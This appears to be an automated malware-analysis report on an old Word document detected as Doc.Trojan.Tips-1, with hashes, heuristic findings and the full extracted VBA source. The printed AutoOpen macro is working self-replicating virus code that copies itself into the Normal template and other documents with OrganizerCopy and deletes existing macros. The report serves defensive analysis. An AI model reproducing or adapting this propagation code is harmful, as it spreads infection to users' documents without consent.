Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c2b366faaf664f24…

MALICIOUS

Office (OLE)

39.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6e5400d574b47ecf66058ba4f6d5389c SHA-1: 7a3537043dc1eac4bf76eecc3bc5b728af00365c SHA-256: c2b366faaf664f24a5cc3622fa175bd17ec6765fae5184f6a5119dc5eda69c90
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and a detected AutoOpen macro, indicating it is designed to execute code when opened. The macro code, though truncated, appears to manipulate document properties and potentially copy itself, suggesting a downloader or self-propagating malware. The presence of specific strings like 'Macro created 01/18/99 by billgates from cuddapah' suggests a deliberate attempt to mislead or attribute the macro to a known figure.

Heuristics 5

  • ClamAV: Doc.Trojan.Tips-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Tips-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "AutoOpen"
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4156 bytes
SHA-256: 96e75253a383d60ed5e9a6aeb3296abe45293db27adbda307df269f321a2cc93
Detection
ClamAV: Doc.Trojan.Tips-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 01/18/99 by billgates from cuddapah"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.AutoOpen"
'
' AutoOpen Macro
' Macro created 01/18/99 by CUDDAPAH BELLGATES FROM MACROSHOFT
'
Dim newstr, filenme, oldstr, normal_template As String
Dim o_docname, n_docname As String
Dim source_name, target_name, temp_var As String
Dim cond_name As String
Dim vrbl As Integer
Dim i, target_flag As Integer
Dim j As Long
Dim cntnr As Object

Dim retval

Set cntnr = MacroContainer
'MsgBox cntnr.Name & "  Is the container of this running code", vbCritical
cond_name = cntnr.Name


On Error GoTo err1

'newstr = Application.ActiveWindow.Caption
'filenme = newstr
'newstr = newstr & " " & " "
'Application.Caption = "Macroshoft Word"
'oldstr = newstr
'Application.ActiveWindow.Caption = newstr
'Application.StatusBar = "Remember Microsoft Word is a Product of ORACLE Corporation INC!!!."
o_docname = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name
 

' ********* getting the source file name **********

If cond_name = Application.NormalTemplate.Name Then

target_flag = 0
source_name = Application.NormalTemplate.Path & "\" & Application.NormalTemplate.Name
target_name = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name

Else

target_flag = 1
source_name = Application.ActiveDocument.Path & "\" & Application.ActiveDocument.Name
target_name = Application.NormalTemplate.Path & "\" & Application.NormalTemplate.Name

End If


'MsgBox source_name & " " & target_name
'on counter set to four then message and counter = 0

temp_var = System.PrivateProfileString("C:\micros.Ini", "MacroSettings", _
    "LastFile")
vrbl = Val(temp_var)

If vrbl = "8" Then
vrbl = 0
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
    "LastFile") = Str(vrbl)
 Set BLN = Assistant.NewBalloon
 
 
With BLN
    .Heading = "Tips of day"
    .Labels(1).Text = "Run Scandisk Every Day"
    .Labels(2).Text = "Run Defrag Once in a Week"
    .Labels(3).Text = "Dont use Drive Compression."
    .BalloonType = msoBalloon
    .Mode = msoModeModal
    .Icon = msoIconAlert
    .Button = msoButtonSetOK
    
     retval = .Show
End With
Application.ActiveWindow.Close
End If

vrbl = vrbl + 1
System.PrivateProfileString("C:\Micros.Ini", "MacroSettings", _
    "LastFile") = Str(vrbl)

'MsgBox System.PrivateProfileString("C:\VirSet.Ini", "MacroSettings", _
    "LastFile")

normal_template = Application.NormalTemplate.Name




On Error GoTo err0

deletemacros (target_flag)


Application.OrganizerCopy source_name, target_name, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy source_name, target_name, "ToolsMacro", wdOrganizerObjectProjectItems

If target_name = normal_template Then
Application.NormalTemplate.Save
End If

Application.ActiveDocument.Save

'MsgBox o_docname
'MsgBox Application.ActiveDocument.Name
err0:
'MsgBox Err.Description

Exit Sub
err1:
End Sub


Public Function deletemacros(t_flag As Integer)
'If t_flag = 0 Then MsgBox "Target is Active Document"
'If t_flag = 1 Then MsgBox "target is normal template"

Dim mct, u As Integer
Dim ass As String


If t_flag = 0 Then
    mct = ActiveDocument.VBProject.VBComponents.Count
    For u = 2 To mct
    ass = ActiveDocument.VBProject.VBComponents.Item(u).Name
    Application.OrganizerDelete ActiveDocument.Name, ass, wdOrganizerObjectProjectItems
    Next

End If

If t_flag = 1 Then
    mct = NormalTemplate.VBProject.VBComponents.Count
    For u = 2 To mct
    ass = NormalTemplate.VBProject.VBComponents.Item(u).Name
    Application.OrganizerDelete NormalTemplate.Name, ass, wdOrganizerObjectProjectItems
    Next

End If




End Function

Open this report in the interactive analyzer, or submit your own file for analysis.